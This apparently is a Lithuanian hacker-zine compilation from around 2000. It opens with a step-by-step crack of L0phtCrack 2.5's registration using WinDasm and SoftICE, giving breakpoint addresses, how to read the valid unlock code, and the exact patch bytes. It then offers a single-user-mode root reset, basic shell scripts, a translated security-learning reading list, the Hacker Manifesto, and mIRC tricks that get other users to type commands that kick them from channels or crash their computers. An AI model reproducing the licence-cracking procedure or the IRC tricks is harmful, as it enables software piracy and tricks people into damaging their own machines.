F8 – jeigu esame ant procedūros, įeiti į ją.

Visus įrankius galima atsisiųsti iš http://ucol.home.lt/cgi-bin/ucol.pl?l_tools.

Krekinimas:

Pirmiausiai reikia nukopijuoti failą l0phtcrack.exe į kokią saugią vietą (to reikės vėliau). Dabar paleidžiame pačią programą (L0phtCrack), spaudžiame mygtuką „Register” ir lauke „Unlock code:” įvedame betką ir žiūrime į iššokusią žinutę: „You have entered an invalid code. Please try again”. Dabar įeiname į disasemblerį (WinDasm). Atidarome failą l0phtcrack.exe (jis yra krekinamos programos direktorijoje). Vykdome paiešką pagal matytą žinutę: „You have entered an invalid code”, t.y. einame į WinDasm meniu sklitį „Search” ir vykdome komandą „Find Text”. Lauke „Find what:” ir įvedame tą žinutę. WinDasm lange atsiduriame čia:

:0040635F 52 push edx

:00406360 50 push eax

:00406361 E8FAFE0100 call 00426260 <- unlock tikrinimas

:00406366 83C408 add esp, 00000008

:00406369 85C0 test eax, eax

:0040636B 7435 je 004063A2 <- ar mūsų unlock geras/blogas

:0040636D 6A00 push 00000000

:0040636F 6A00 push 00000000

* Possible StringData Ref from Data Obj ->”You have entered an invalid code. „

->”Please try again.” <- mūsų žinutė

:00406371 6830354800 push 00483530

:00406376 E8F0020500 call 0045666B

:0040637B 56 push esi

:0040637C 8D8C24E0000000 lea ecx, dword ptr [esp+000000E0]

:00406383 E812EE0300 call 0044519A

:00406388 8D8C2480000000 lea ecx, dword ptr [esp+00000080]

:0040638F E88ED50300 call 00443922

:00406394 83F801 cmp eax, 00000001

:00406397 0F846EFFFFFF je 0040630B

Dabar programą L0phtCrack užkrausime per SoftICE loaderį (loader32.exe). Užkrauname loaderį. Atidarome failą l0phtcrack.exe. Paskui užkrauname programą spausdami mygtuką „LOAD” arba eidami į programos meniu „MODULE/LOAD”. Aktyvuojasi SoftICE, tada spaudžiame F8 (vieną sykį). Dabar rašome: Bpx 40635f (tai mes matėme disasembleryje). Bpx yra viena iš SoftICE komandų, o skaičius 40635f yra vykdomos programos eilutės vieta. Taigi įrašyta eilutė lieps SoftICE sustabdyti programos veikimą ties ta eilute. Suprantat link kur suku? Dabar išeiname iš SoftICE (F5). Pasileidžia L0phtCrack. Vėl einame į programos užregistravimo langą. Lauke „Unlock code:” surenkame sux.

Spaudžiame OK. Aktyvuojasi SoftICE. Matome labai panašų vaizdą kaip ir

Disasembleryje (WinDasm):

:0040635F 52 push edx

:00406360 50 push eax

:00406361 E8FAFE0100 call 00426260 <- unlock tikrinimas

:00406366 83C408 add esp, 00000008

:00406369 85C0 test eax, eax

:0040636B 7435 jz 004063A2 <- geras/blogas unlock

:0040636D 6A00 push 00000000

:0040636F 6A00 push 00000000

:00406371 6830354800 push 00483530

:00406376 E8F0020500 call 0045666B

:0040637B 56 push esi

:0040637C 8D8C24E0000000 lea ecx, dword ptr [esp+000000E0]

:00406383 E812EE0300 call 0044519A

:00406388 8D8C2480000000 lea ecx, dword ptr [esp+00000080]

:0040638F E88ED50300 call 00443922

:00406394 83F801 cmp eax, 00000001

:00406397 0F846EFFFFFF jz 0040630B

Rašome: d edx (Hmm kažkas yra. Užsirašome tai savo lape)

d eax (Mūsų įvestas „sux” (be kabučių))

Komanda d parodo registro (EAX, EDX…)turinį. Sintaksė yra tokia: d

Registras

Uždraudžiame visų breakpointų (Bpx) naudojimą, t.y. parašome komandą BD *.

Išeiname iš SoftICE (F5). Dabar teksto lauke „Unlock code:” parašome tai ką buvome užsirašę. Pas mane buvo 6be3b311. Spaudžiame OK. Bingo! Pasirodo žinutė: „You have successfully registered L0phtCrack 2.5″. Tai reiškia, kad jūs sėkmingai užregistravote „L0phtCrack v2.5″. Bet ne visi turi SoftICE ir Disassembler, todėl jūs turite padaryti patchą.

Tai bus programa kuri žinutės pavidalu parodo unlock kodą. Bet jūs dabar jau užregistravote programą, todėl eikite į windows „Start” meniu ir vykdykite komnadą „Run”, tada surinkite „regedit” (be kabučių). Atsiduriame programoje, kuri redaguoja windowz registrą. Einame į HKEY_CURRENT_USERSOFTWAREL0phtL0phtCrack ir ištriname „Registration” stringą. Dabar jau galima daryti patchą.

Patcho darymas:

Einame į SoftICE(Ctrl+D). Surenkame komandą: Bpx MessageBoxA. Apie „Bpx” kalbėjau anksčiau, o apie „MessageBoxA” pakalbėsiu dabar. Tai yra standartinė API funkciją. Taigi mes su komanda „Bpx MessageBoxA” sustabdysime programą tada, kai ji vykdys šitą funkciją. Funkcija „MessageBoxA” išmeta žinutę. Dabar kur „Unlock code:” įvedame bet ką ir spaudžiame OK. Aktyvuojasi SoftICE. Mes esame procedūroje „MessageBoxA”, kad išeitume iš jos mes turime spausti 8 sykius F10, kai atsiranda žinutė OK ir dar 2 sykius F10 arba vieną sykį F11 ir OK (nežinau kas jums patinka labiau J). Mes išėjome iš procedūros. Štai ką matome:

:0045662E 53 Push EBX

:0045662F 57 Push EDI

:00456630 FF7508 Push DWORD PTR [EBP+08]

:00456633 FF75F4 Push DWORD PTR [EBP-0C]

:00456636 FF150014D100 Call [User32!MessageBoxA]

Parašome: Bpx 45662e (tai bus reikalinga vėliau).

Dabar turime ieškoti seniau surasto unlock kodo (pas mane buvo 6be3b311).

Rašome: d eax (Fuck!)

d edx (Fuck!)

d ebi (Fuck!)

d ebp (Štai jis čia!)

Radome, kad jis registre EBP, bet jis dar ne jo pradžioje, taigi rašome d ebp+54 ir jis jau pradžioje. Jis randasi vietoje F7FBE4 (šešioliktainis kodas). Patchas vietoj žinutes: „You have entered an invalid code. Please try again”, parodys unlock kodą. Taigi mes turime tą žinutę perdirbti. Procedūra MessageBoxA susideda iš šių dalių:

Push 00

Push <žinutės lango pavadinimas>

Push <žinutė>

Push 00

Call MessageBoxA

Mes jau žinome, kad unlock kodas yra vietoje F7FBE4 (šešioliktainis kodas), bet mums dar reikia žinutės lango pavadinimo. Mes padarysime taip, uždarome programą L0phtCrack. Failą l0phtcrack.exe atsidarome su šešioliktainiu redaktoriumi ir ieškome pagal frazę: „You have entered an invalid code” (be kabučių). Atsirandame vietoje 83530 (šešioliktainis kodas).

Šita žinutė pakeičiame žinute: „Unlock kodas yra:” (be kabučių) + 00 (tai parodo, kad žinutė užsibaigia toje vietoje). Visas šešioliktainis kodas atrodys taip: 55 6E 6C 6F 63 6B 20 6B 6F 64 61 73 20 79 72 61 3A 00. Neužmirškite išsaugoti failą! SoftICE žinutės vieta yra kitur. Kyla klausimas kur?

Mes tiesiog turime prie 400000 pridėti 83530 (vieta faile) ir gausime 483530 (šešioliktainis kodas). Tai ir yra vieta SoftICE. Štai turime ir lango pavadinimą ir žinutę. Tai atrodo taip:

Push 00

Push 483530

Push F7FBE4

Push 00

Call MessageBoxA

Dar atsimenate anksčiau uždėta breakpointą Bpx 45662e? Štai čia mes ir įdėsime šitą žinutę. Vėl einame į L0pthCrack. Renkame kokį nors blogą unlocką! Aktyvuojasi SoftICE ties 45662e. Užsirašome apie aštuonis šešioliktainius kodus: 53 57 FF 75 08 FF 75 F4 Jie bus pažymėti ^^^^^^^^^^ (kad jums būtų aiškiau). Jie bus reikalingi ieškant vietos su šešioliktainiu redaktoriumi:

:0045662E 53 Push EBX

:0045662F 57 Push EDI

:00456630 FF7508 Push DWORD PTR [EBP+08]

:00456633 FF75F4 Push DWORD PTR [EBP-0C]

:00456636 FF150014D100 Call [User32!MessageBoxA]

Dabar parašome komandą a (assembler). Spaudžiame klavišą enter ir parašome šias eilutes:

Push 00

Push 483530

Push F7FBE4

Push 00

Call MessageBoxA

Nop

Baigia rašyti, spaudžiame klavišą „Escape”! Komanda nop reikalinga, kadangi sugadinome vieną komandą, nes naujai žinutei prireikė daugiau baitų. Komanda buvo nepilna, todėl mes ją panaikinonome (NOP reiškia nieką. Ji tiesiog nevykdoma). Jeigu šito būtume nepadarę būtume sugadinę programą ir ji butų neveikusi!

Pakeistas kodas su SoftICE:

:0045662E 6A00 Push 00

:00456630 6830354800 Push 483530

:00456635 68E4FBF700 Push F7FBE4

:0045663A 6A00 Push 00

:0045663C E898D2B0BF90 Call USER32!MessageBoxA

:00456641 90 Nop

Pabaiga:

Dabar jau užsirašome visus pakeistus eilučių šešioliktainius kodus: 6A 00 68 30 35 48 00 68 E4 FB F7 00 6A 00 E8 98 D2 B0 BF 90. Išeiname iš SoftICE ir L0phtCrack. Einame į šešioliktainį redaktorių.

Faile ieškome pagal tuos aštuonis anksčiau užsirašytus kodus: 53 57 FF 75 08 FF 75 F4 ir nuo tos vietos pakeičiame į pakeistus kodus: 6A 00 68 30 35 48 00 68 E4 FB F7 00 6A 00 E8 98 D2 B0 BF 90. Tai ir yra mūsų patchas. Dabar paleidžiame L0phtCrack ir einame surinkti unlock.

Spaudžiame OK ir matome žinutę: „Unlock kodas yra:” XXXXXXXX (X yra bet koks simbolis). Spaudžiame OK ir renkame matytą kodą. Vėl atsiranda ta pati žinutė. Paspaudžiame OK ir mes jau užsiregistravę J. Taigi dabar mes turime nupachintą l0phtcrack.exe failą, bet toks failas yra didelis ir tik pas jus, todėl mes turime padaryti programa, kuri automatiškai, tą EXE failą nupatchintų.

Tam ir reikalinga pradžioje minima programa „UCOL Patch Maker”. Ar dar atsimenate, kad iš pat pradžių l0phtcrack.exe nukopijavote į saugią vietą? Taigi jūs turite ogiginalų ir nupatchintą failus, o ką toliau reikia daryti žiūrekite į programos „UCOL Patch Maker” aprašymą!

26. Linux tutorialas naujokams

1. Ka daryti jei uzmirsau r00t passworda?

2. Ismok parasyti shell scriptus

1. Ka daryti jei uzmirsau r00t passworda?

Karta kol buvau didelis Linux newbie atsitiko vienas dalykas:

uzmirsau r00t passworda.

O kitaip gauti r00t teisiu nejo/nemokejau, tad teko perinstalioti visa linux.

Kad ir jums nereiktu del to vargti papasakosiu, kaip gauti r00t teises kompiuteryje:

Ijungus kompiuteri islenda lilo raginimas pasirinti OS.

Jus iveskite linux labeli ir po tarpo parasykite raide ‘S’.

Tada linuxsas krausis single mode rezimu, o uzsikroves duos jums shell`a su r00t teisemis.

Tada galesite pakeisti slaptazodi su ‘passwd’ komanda.

2. Ismok parasyti shell scriptus

Kartais schell skriptai arba aplinkos scenarijai sutrumpina jusu darbo laika. Jie gali vykdyti tam tikra komandu seka, t.y. automatizuoti tavo darba.

Kaip rasomi sie skriptai?

Pirmoje eiluteje rasomas ‘#!’ ir pilnas shell interpretatoriaus pavadinimas t.y. pavadinimas su keliu. Pvz. #!/bin/bash po to rasomos komandos kurias alikines scriptas.

PVZ. Nr. 1:

#!/bin/bash

#viskas kas prasideda ‘#’ yra komentarai

#Sis skriptas demonstruoja kaip prieiti prie skripto argumentu

#Suzinoti savo uid ir username

#echo -spausdina kintamaji, eilute i STDOUT

echo „Skripto pavadinimas:” $0

echo „Pirmas argumentas :” $1

echo „Antras argumentas :” $2

user=`id -un`;

#ivykdo id -un ir isvesti perduoda kintamajam $user uid=`id -u`;

echo „Username: ” $user echo „uid: ” $uid

###### End Of Script Nr. 1 #########

PVZ. Nr. 2:

#!/bin/bash

#viskas kas prasideda ‘#’ yra komentarai

#Skriptas demonstruoja salygini sakini if if [ -d /etc/httpd ] # -d tikrina ar failas yra katalogas then echo „tu turi instaliaves apache ar kita www serveri”

else echo „gali buti, kad jus neturite jokio www serverio”

fi # kas sake kad programuotojai be humoro jausmo

###### End Of Script Nr. 2 #########

PVZ. Nr. 3:

#!/bin/bash

#viskas kas prasideda ‘#’ yra komentarai

#demonstruoja cikla while while read Line; #skaito is STDOUT eilute do echo $Line; #ja spausdina done

#skriptas dirba panasiai kaip komanda cat

###### End Of Script Nr. 3 #########

PVZ. Nr. 4:

#!/bin/bash

#viskas kas prasideda ‘#’ yra komentarai

#demonstruoja kaip valdyti telnet ar pan…

telnet host 21 << EOF #konektinas su host kompu per 21 porta qoute user FTP #siuncia useri qoute pass email@email.dom #pasworda

MKDIR /same/dir #kuria dorektorija qoute quit #atsisveikina su ftpd ir baigia darba

EOF

###### End Of Script Nr. 4 #########

27. Laikinas LINUX tinklas namie

From harlequin@fnord.org.uk Tue Jun 20 12:25:18 2000

Newsgroups: alt.2600,alt.2600.hackerz,alt.hacker,alt.hacking

Subject: HowTo: Makeshift Linux Network @ Home ..

From: Harlequin

Date: Tue, 20 Jun 2000 10:25:18 GMT

[Nuo VisiGoth:

1.Šita žinutė buvo perdyota Quinny 12.30.98 neribotam laikui.

2.Šitą žinutė paskelbė Osiris prieš kurį laiką (galbūt prieš pusantrų metų???) ir nuo to laiko jos daug kas ieškojo, bet niekas daugiau jos nepaskelbė, net pats Osiris, tad aš radau laiko paskelbti ją iš naujo kiekvienamm, kuris jaučia, kad jos reikia, nes aš manau, kad tai yra -labai- gera žinutė ir ji -turi- būti perskaityta kiaurai išilgai.]

1. Gauk Linux arba FreeBSD ASAP

2.Įsigyk vieną arba daugiau knygų, parašytų Spaffordo, Bellovino, Cheswicko,

Rubino arba Ranumo.

3.Gauk tiek Camelio, tiek Llamos knygas apie Perl

4.Gauk ORA knygą apie TCP/IP

5.Nusipirk keletą senų kompų (386/486) ir instaliuok tinklo plokštes. Apsiginklavęs šitais daikčiukais sukonstruok mažą UNIX tinklą savo namuose (arba garaže). Jei pasirinksi LINUX, perskaityk visus HOWTO, ypatingai tinklų HOWTO. Sukurk bent 5 vartotojų akauntus, leisdamas bent jau šelo priėjimą iš kiekvieno akaunto kiekviename kompe. Kai viskas bus sukonfigūruota (tinklas yra ir veikia), pabandyk (kaip skirtingas varotojas) įsilaužti į vieną ar kelis kompus tinkle. (Tu turėtum idealiai atakuoti įvairius servisus, ne tik kokį nors vieną.)

Taipogi: parsisiųsk SAFEsuite demo, seną ISS arba SATAN. Leisk šitas utėles prieš savo sistemą ir perskaityk tutorialus, kurie yra pridėti prie šitų utėlių dokumentacijos.

Toliau, gauk visus įrankius iš šito URL:

http://www.giga.or.at/pub/hacker/unix

Išmok kiekvieną iš jų naudoti. Toliau, gauk AUSCERT UNIX saugumo sąrašą iš:

ftp://ftp.auscert.org.au/pub/auscert/papers/unix_security_checklist

Toliau, gauk UNIX saugumo sąrašą iš:

http://stimpy.cac.washington.edu/~dittrich/R870/security-checklist.html

Toliau, gauk Site Security Handbook (RFC 1244) iš:

http://stimpy.cac.washington.edu/~dittrich/R870/rfc1244.txt

Toliau, gauk šitą dokumentą iš SRI:

http://stimpy.cac.washington.edu/~dittrich/R870/SRI-Whitepaper.ps

Po to, kai perskatysi ir suprasi visą aukščiau išdėstytą dokumentaciją (ir išbandysi kai kuriuos arba visus minimus įrankius, perskaityk šituos dokumentus:

Intrusion Detection Checklist:

ftp://info.cert.org/pub/tech_tips/intruder_detection_checklist

Dan Farmer’s Survey on Various Hosts:

http://www.trouble.org/survey/

Improving the Security of Your Site by Breaking Into it:

http://www.trouble.org/security/admin-guide-to-cracking.html

Visą popierizmą šitam saite, bet ypač Nancy Cook ir jos partnerio darbą:

http://www.trouble.org/security/auditing_course/

Murphy’s law and computer security by Wietse Venema:

http://www.trouble.org/security/murphy.html

Po to kai absorbuosi ir šią informaciją, ieškok šitų popierių:

CIAC-2308_Securing_Internet_Information_Servers.pdf:

http://ciac.llnl.gov/ciac/documents/CIAC-

2308_Securing_Internet_Information_Servers.pdf

Securing X Windows:

http://ciac.llnl.gov/ciac/documents/CIAC-2316_Securing_X_Windows.pdf

How to Detect an Intrusion:

http://ciac.llnl.gov/ciac/documents/CIAC-

2305_UNIX_Incident_Guide_How_to_Detect_an_Intrusion.pdf

Galiausiai, eik čia ir studijuok kiekvieną skylę, minimą BUGTRAQ archyve:

http://www.geek-girl.com/bugtraq/search.html

Kiti tau labai padėsiantys dalykai:

1.Užsiprenumeruok visas žinutes apie UNIX saugumą, pvz.BUGTRAQ,

CIAC, CERT ir t.t.

2.Iš šitų sąrašų susidaryk žinomų saugumo ekspertų (pvz.Farmerio, Venemos, Spaffordo,

Ranumo ir kitų) emailų adresų duomenų bazę.

3.Šniukštinėk Internete bet kokių jų emailų apraiškų – sąrašuose, diskusijų grupėse ar tiesiog webe. (Dėmesio! Nebandyk nervinti šitų vaikinų, tiesiog perskaityk jų mintis ir idėjas, absorbuok jas ir judėk toliau).

4.Kai tu susidursi su exploitų kodu (o tu būtinai susidursi), paminėtu sąrašuose, sukompiluok ir įvykdyk jį. Užsirašyk rezultatus. (Viena gera priežastis instaliuoti LINUX ar FreeBSD: visi kompiliatoriai yra nemokami ir per pilną instaliaciją jau gerai sukonfigūruoti).

5.Pabandyk praleisti bent po valandą į dieną studijuodamas soketų programavimą.

6.Nueik į naudotų knygų knygyną ir nusipirk kiekvieną knygą apie sistemų administravimą. Bent jaunusipirk knygas, nukainuotas labai stipriai. Kuo pigesnės, tuo geriau.

7.Nežvenk, nes šitų kalbų pradmenys tikrai daug padės:

A. PERL

B. AWK/GAWK/NAWK

C. SED

D. Expect

Taipogi pagelbėtų lentelė, kurioje būtų skirtumai tarp panašias ar identiškas užduotis, atliktas sh/bash/csh. Be to, jums turėtų būti įdomu paieškoti skirtumų tarp skirtingų UNIX versijų. Verta nusipirkti senų AIX, HP-UX, Unicos, IRIX, Data General, SunOS, Solaris, XENIX, SYS V ir t.t. instrukcijų. Žemiau esantis knygų sąrašas taipogi galėtų tau padėti. (Jos surašytos abėcėlės tvarka, ne pagal patikimą. Asmeniškai, aš rinkčiausi knygas, minėtas aukščiau.)

Building Internet Firewalls

D. Brent Chapman, Elizabeth D. Zwicky (1995)ISBN: 1565921240

Commonsense Computer Security: Your Practical Guide to

InformationProtection

Martin R. Smith (1994)ISBN: 0077078055

Computer Crime: A Crimefighter’s Handbook

David J. Icove, David, Seger, Karl Icove, Karl A. Seger, Vonstorch

(1995)ISBN: 1565920864

Computer Security

John M. Carroll

(1996)ISBN: 0750696001

Computer Security Basics

Deborah Russell, G.T. Gangemi

(1991)ISBN: 0937175714

Computer Security Handbook

Arthur E. Hutt, Seymour Bosworth, Douglas B. Hoyt

(1995)ISBN: 0471118540

Firewalls and Internet Security: Repelling the Wily Hacker

William R. Cheswick, Steven M. Bellovin

(1994)ISBN: 0201633574

Fundamentals of Computer Security Technology

Edward G. Amoroso

(1994)ISBN: 0131089293

Hacker Proof: The Ultimate Guide to Network Security

Lars Klander, Edward J. Renehan

(1997)ISBN: 188413355X

Halting the Hacker: A Practical Guide to Computer Security

Donald L. Pipkin

(1997)ISBN: 013243718X

Information Warfare : Chaos on the Electronic Superhighway

Winn Schwartau (1996)ISBN: 1560251328

Internet Firewalls and Network Security

Chris Hare, Karanjit S. Siyan

(1996)ISBN: 1562056328

Internet Firewalls and Network Security

Karanjit, Ph.D. Siyan, Chris Hare

(1996)ISBN: 1562054376

Internet Security: Professional Reference

Derek Atkins, Tom Sheldon, Tim Petru, Joel Snyder

(1997)ISBN: 156205760X

Maximum Security: A Hacker’s Guide to Protecting Your Internet Site and

Network

Anonymous (1997)ISBN: 1575212684

Personal Computer SecurityEdward Tiley

(1996)ISBN: 1568848145

Practical Unix and Internet Security

Simson Garfinkel, Gene Spafford

(1996)ISBN: 1565921488

Protecting Your Web Site With Firewalls

Marcus Goncalves, Vinicius A. Goncalves

(1997)ISBN: 0136282075

Protection and Security on the Information Superhighway

Frederick B. Cohen

(1995)ISBN: 0471113891

Secrets of a Super HackerKnightmare, the Knightmare

(1994)ISBN: 1559501065

Security in ComputingCharles P. Pfleeger

(1996)ISBN: 0133374866

Web Commerce Cookbook

Gordon McComb

(1997)ISBN: 0471196630

Web Security Sourcebook

Avi Rubin, Daniel Geer, Marcus J. Ranum, Aviel D. Rubin, Dan Geer

(1997)ISBN: 047118148X

Web Security & Commerce (Nutshell Handbook)

Simson Garfinkel, Gene Spafford

(1997)ISBN: 1565922697

http://www.amazon.com/exec/obidos/ISBN=1565922697/t/0560-5831826-082656

Access Control and Personal Identification Systems

Dan M. Bowers

(1988)ISBN: 0409900834

Internet Security SecretsJohn R. Vacca.

(1996)ISBN: 1-56884-457-3

Network and Internetwork Security: Principles and Practice.

William Stallings.

(1995)ISBN: 0-02-415483-0

Network Security: How to Plan for It and Achieve It.

Richard H. Baker.

(1994)ISBN: 0-07-005141-0

UNIX Security for the Organization.

R. Bringle Bryant.

(1994)ISBN: 0-672-30571-2

UNIX Security: A Practical Tutorial.

N. Derek Arnold.

ISBN: 0-07-002560-6 (1993)

UNIX System Security: How to Protect Your Data and Prevent Intruders.

Rick Farrow.

(1991)ISBN: 0-201-57030-0

UNIX System Security Essentials.

Christoph Braun and Siemens Nixdorf.

(1995)ISBN: 0-201-42775-3

UNIX System Security.

David A. Curry.

(1992)ISBN: 0-201-56327-4

UNIX Unleashed. 1994

Susan Peppard, Pete Holsberg, James Armstrong Jr., Salim Douba, S.Lee

Henry, Ron Rose, Richard Rummel, Scott Parker, Ann Marshall, Ron

Dippold, Chris Negus, John Valley, Jeff Smith, Dave Taylor, Sydney

Weinstein and David Till

ISBN: 0-672-30402-3.

Galiausiai tau prireiks gerų įrankių eksperimentavimui. Juos rasi čia:

http://ciac.llnl.gov/ciac/SecurityTools.html

Pradžiai tau to turėtų užtekti. Tau nebūtina viską išmokti per vieną kartą.Be abejo, firma, siūlanti tau darbą, nesitiki neįmanomo. Visgi UNIX saugumas yra besivystanti ir sudėtinga sritis. Tu neįvaldysi jos per vieną kartą. Idėja tokia: išsiaisškink senas problemas, kad kai išlįs naujos, tu žinosi jų pagrindus ir kilmę.

Pagrindinė priežastis, dėl kurios vertėtų kurti tinklą savo garaže, yra ta, kad tu turėsi šansą viską suknisti be didesnių pasekmių. Be to, tu simuliuosi mikrotinklą, galėsi žiūrėti logus ir atsakymus tiek iš atakuotojo, tiek iš aukos pusės. Tai yra labai vertinga, nes tai padės tau pasiruošti staigiai atpažinti problemą vien tik peržiūrėjus logus. Svarbiausios sritys, kuriose tau reikėtų pasikaustyti:

1. NFS

2. R servisai

3. Slaptažodžiai – aktyvūs slaptažodžių tikrintojai, bendros žinios apie DES, krekinima ir t.t.

4. Spūfinimas (spoofing)

5. Maršrutizavimas (routing)

6. Ugnies sienos (firewallai)

7. CGI (jeigu web serveriai yra integruota to tinklo architektūros dalis).

Rekomenduotina gauti TIS Firewall Toolkitą kai tik būsi pasirengęs. (Nors aš manau, kad firma, kuri tave samdys, labiau domėsis vietiniu saugumu negu nuotolinėmis problemomis. Šiaip ar taip, tai padaryti verta).

Išvertė Winter Wolf (c) Y2K

28. Hackerio manifestas

Shiandien jie sueme dar viena. Tai – visuose laikrashciuose.

„Kompiuterinis nusikaltimas, Areshtuotas tineidzheris”, „Suimtas hackeris isibroves i banka” …Prakeikti vaikiai. Visi jie vienodi.

Bet ar jus, su savo trydalia psichologija ir 1950tuju technosmegenim, bandete kada nors pazhvelgti hackeriui uzh akiu? Ar norejote zhinoti, kodel jis yra toks koks yra, kokios jegos ji suformavo?

Ash hackeris, ieikit i mano pasauli… Shis pasaulis prasideda mokykloj… Ash gudresnis nei kiti, o tai, ko mus moko man jau ikyrejo. Prakeitas nenaudelis. Visi jie vienodi. Ash vyresniese klasese, klausydamas kai mokytojas penkiolikta karta aishkina apie trupmenos prastinima. Ash suprantu tai. „Ne, ponas Smitai, ash nerodysiu savo darbo, ash padariau tai mintinai…” Prakeiktas vaikis. Tikriausia nusirashe. Visi jie vienodi.

Shiandien ash padariau atradima. Ash atradau kompiuteri. Pala, pala…

tai yra geras! Jis daro tai, ko ash ish jo noriu. Jeigu jis suklysta, tai tik del to, kad ash kazhka sumaishiau. Ne del to, kad jis manes nemegsta… ar bijo manes… ar mano kad ash gudri subine…

Ar nemegsta mokyti ir neturetu buti cia…

Prakeiktas vaikis. Viska, ka jis daro – tik zhaidimus zhaidzhia.

Visi jie vienodi.

Ir shtai tai atsitinka… Durys i pasauli atsiveria… Elektroninis impulsas skuba telefono linijom, kaip heroinas narkomano venomis.

Ash pagaliau radau prieglauda nuo kasdieninio neishmanelishkumo, ash atradau BBS’a. „Shtai ir yra tai… tai kur ash priklausau..”

Ash pazhistu cia kiekviena… netgi jei ash niekad nebuvau ju sutikes… niekad su jais nekalbejau ir galbut niekad daugiau apie juos neishgirsiu… Ash pazhistu jus visus….

Prakeiktas vaikis. Vel uzhima telefono linija. Visi jie vienodi.

Taip, subingalvi, visi mes vienodi. Mokykloje mus ish shaukshtelio maitino vaikishku pienu, kai buvome ishalke gero bifshtekso…

tie mesos kasneliai, kuriuos jus leidote mums praryti buvo sukramtyti ir beskoniai. Mes buvom priklausomi nuo sadistu ir ignoruojami abejinguju. Tie, kurie ishtikruju turejo ko mokyti, laike mus daug zhadanciais mokiniais, bet tie keli buvo kaip vandens lashas dykumoje…

Dabar tai musu pasaulis… elektronu ir komutatoriu, baud’o grozhio pasaulis.

Mes nemokame uzh paslaugas, kurios butu pigios, jei nebutu kontroliujamos spekuliuojancziu apsirijeliu, ir jus vadinate mus nusikalteliais. Mes tyrinejam… ir jus vadinate mus nusikalteliais.

Mes egzistuojame be odos spalvos, be tautybes, be religiniu nusistatymu… ir jus vadinate mus nusikalteliais.

Jus konstruojate atomines bombas, jus kurstote karus, jus zhudote, sukciaujate ir meluojate mums, bandydami mus itikint, kad tai musu paciu labui, o mes vis dar nusikalteliai.

Taip, ash nusikaltelis. Mano nusikaltimas yra smalsumas. Mano nusikaltimas yra tai, kad ash vertinu zhmones pagal tai, ka jie sako ir galvoja, o ne pagal tai, kaip jie atrodo.

Mano nusikaltimas yra tai, kad ash protingesnis uzh jus, tai, ko jus man niekad neatleisite.

Ash hackeris, ir tai mano manifestas. Jus galit sustabdyti viena, bet jus negalit sustabdyti musu visu. Juk kaip ten bebutu, visi mes vienodi.

+++The Mentor+++

Verte Meshkutiz Grizlius & M.Mazhvydas, ish

‘HACKERS MANIFESTO’ by The Mentor

29. MIRC bug’s

Shtai keli budai kaip apgauti lamerius padariusiu takeover! kokiame nors jusu kanale:

1.Galite apsimesti reklamos agentu sakydami : „Sveikas jei nori waru takeoveriu ir viso kito ateik i kanala #6,0”, kai jis parashys /j 6,0 ar /j #6,0 ir paliks visus kanalus iskaitant ir tavo! Zhodzi ureikia lameri priversti parashyti /j 6,0 tada jis paliks kanala! Zhodziu netures opo!

2.Gali pasakyti dar ka : „Sveiki ash esu botas eggdropas del papildomu komandu rashykite /con/con”, jei jis parashys tai jis jau skaitykite atgavote kanala, lameriukas dabar perkrauti kompa turi! (Taip jam ir reikia)

3. Dar vienas geras budas pamokyti lamerius(takeoverintojus) – jei sako kad nori opo, jam sakyk rashyk /server op #hakeriai ir jam geraj nesibaigs, nes jis jau ***Lamer has quit IRC!!!!

Realiai shi komanda pakeichia serverius pvz jei jis parashytu /server irc.is.lt jis tik jungtusi prie jo… O musu kietajam hakeriu vien zhodis /server ka reishia!!!! =]

Nu bet atsiminkite kad shie budai veikia tik totaliems neishmaneliams!

NU tiek Craft[Eye] – CraftEye@gmx.net

30. MIRC invisibility

2000.10.26 (c) J-azz

*Life iz sux*

*Telekomaz Must die*

*J-azz iz Alive*

He110, everybody… na ka kadangi zhiuriu kazhkajp visi aptilo su txt’u rashymu, taj sakau gal man rejkia pagelbet…

Ajshq shis textaz yra skirtaz TIK 🙂 mokymo tixlamz ir ash jokioz atsakomybez neprisiimu. Ir uzh skajtytojo vejxmuz neatsakau…

Texte vartojami ishsirejshkimaj neatitinka lietuviu kalboz normu.

Taj ka vazhiuojam? oky-doky..

31. MIRC’o slaptybez

(Pagal „Efektivnij Hacking” by Aleksej Petrovskij, Boris Leontjev)

*Ivadaz*

Taj ka bichiuli atsibodo paprastaj bazarint ir kabint panaz, kurioz tik slepdamosi uz monitoriauz atrodo kjetoz? 0 susitikuz neishtrauki nej zh0dzhi0… hmmmm.. That’z n0 c00l? I kn0w, I kn0w… Na ka pradedam su rimtesniaiz dalykajz… na chia shitam txt’e, nebus njeko tokio kazhko ypatingo, bet… svarbu info.. ania? Lekjam toliau, atsidaryk alauz ir skaityk..

*Tapk nematomaz*

Na chia tox dalykaz kaip nematomumaz. Ivykdome komanda:

/mode $me +i

Paprasta? Ir kas tau ish to? Na gi nieko ypatingo, tu tapaj nematomas visjemz qrie nezhino tavo tixlaus nick’o.. ir be to negales taves rast pagal Userid(dalis tavo y-mail’a iki simbolio @), bej bandydami su komandom /who arba /names

Naujausiose IRC versijose taj jau gali ijungti ir lange Setup uzhdedamaz varnele ant

Invisible Mode Ajshq, jei uzhejsi i kanala tu tapsi matomu(matysis nick’az)…

*Komanda /who*

Pakankamaj galinga pajeshkoz komanda yra /who, pagal kokia nors jau zhinoma informacija.

Ir kazhkodel taj apie taj nej zhodzhiu neuzhsiminta mIRC’o Help’e(Pac netikrinau ar tikraj nera, pasitikiu shaltiniu). Naudodami komanda

/whois Lamer

Mes dazhniausiai gaunam kazhka panashaus i taj:

Lamer ~qrutaz@takas.mustdie.lt * cool

Lamer on #lamerland #qrutaj

Lamer using irc.omnitel.net[193…..]

Omniteliz

End of /WHOIS

Komanda /who lejdzhia daryti pajeshka pagal mums jau zhinoma dali, pvz. Real Name, Userid… etc.

pvz:

mes jeshkom kahzko ish Marijoz zhemez:

/who *.lt*

arba tu jau bendravaj su Lamer’iu ir nori ji rasti vel:

/who *qrutaz*

arba

/who *cool*

Tajp gali rasti ir tave jei nesinaudosi nematomumu.

*ThE EnD*

Taj tjek apje IRC 2night… CUL

P.$.

Jei bus dar alauz ir merdzhinu, taj bus dar ir textu.. 😉

[Njeko nekejsdami galite lajsvaj platinti]

P.$.$.

4 more info check me out on Internet y-mejl: J-azz@centras.lt

32. Namezero

Namezero.com Uzhejes i tikrai shaunu saita UID0 pamachiau straipsni apie Namezero baneriu panaikinima… Tikrai idomus faktas apie tai, kad namezero baneriai yra sudaryti ish papraschiausiu frame’u. SaTaN sugalvojo buda, kuris nukilina namezero frame’a.

